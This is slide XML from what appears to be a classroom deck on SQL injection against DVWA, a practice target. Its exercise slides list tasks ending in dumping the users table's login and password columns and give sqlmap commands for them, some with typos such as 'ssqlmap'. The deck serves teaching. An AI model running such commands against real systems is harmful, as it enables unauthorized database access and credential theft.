                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00FF00"/>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5" name="Shape 1465"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1466" name="Google Shape;1466;p110"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="14185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Next, use a UNION-bases injection to perform the following tasks: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1467" name="Google Shape;1467;p11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68" name="Google Shape;1468;p110"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="730813"/>
            <a:ext cx="9144000" cy="1188600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Grab the database banner.</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>List all available databases.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>List the tables of the dvwa database. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>List the columns of the users table. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Dump the login and password columns of the users table. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1469" name="Google Shape;1469;p110"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1919425"/>
            <a:ext cx="9144000" cy="2925900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&gt; Banner = sqlmap -u "http://youripaddress/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="PHPSESSID=your session ID; security=low"--banner</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00FF00"/>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3" name="Shape 1473"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1474" name="Google Shape;1474;p111"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="14185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Next, use a UNION-bases injection to perform the following tasks: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1475" name="Google Shape;1475;p11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76" name="Google Shape;1476;p111"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="730813"/>
            <a:ext cx="9144000" cy="1188600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Grab the database banner.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>List all available databases.</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>List the tables of the dvwa database. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>List the columns of the users table. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Dump the login and password columns of the users table. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1477" name="Google Shape;1477;p111"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1919425"/>
            <a:ext cx="9144000" cy="2925900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&gt; Banner = sqlmap -u "http://youripaddress/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="PHPSESSID=your session ID; security=low"--banner</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&gt; Databases = ssqlmap -u "http://youripaddress/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="PHPSESSID=your session ID; security=low" --dvwa</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00FF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4" name="Shape 1064"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1065" name="Google Shape;1065;p5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Warm Up Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1066" name="Google Shape;1066;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="9144000" cy="344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24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>1. Select all users whose last name is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>Doe.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>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1" name="Shape 1481"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1482" name="Google Shape;1482;p112"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="14185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Next, use a UNION-bases injection to perform the following tasks: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1483" name="Google Shape;1483;p11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84" name="Google Shape;1484;p112"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="730813"/>
            <a:ext cx="9144000" cy="1188600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Grab the database banner.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>List all available databases.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>List the tables of the dvwa database. </a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>List the columns of the users table. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Dump the login and password columns of the users table. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1485" name="Google Shape;1485;p112"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1919425"/>
            <a:ext cx="9144000" cy="2925900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&gt; Banner = sqlmap -u "http://youripaddress/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="PHPSESSID=your session ID; security=low"--banner</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
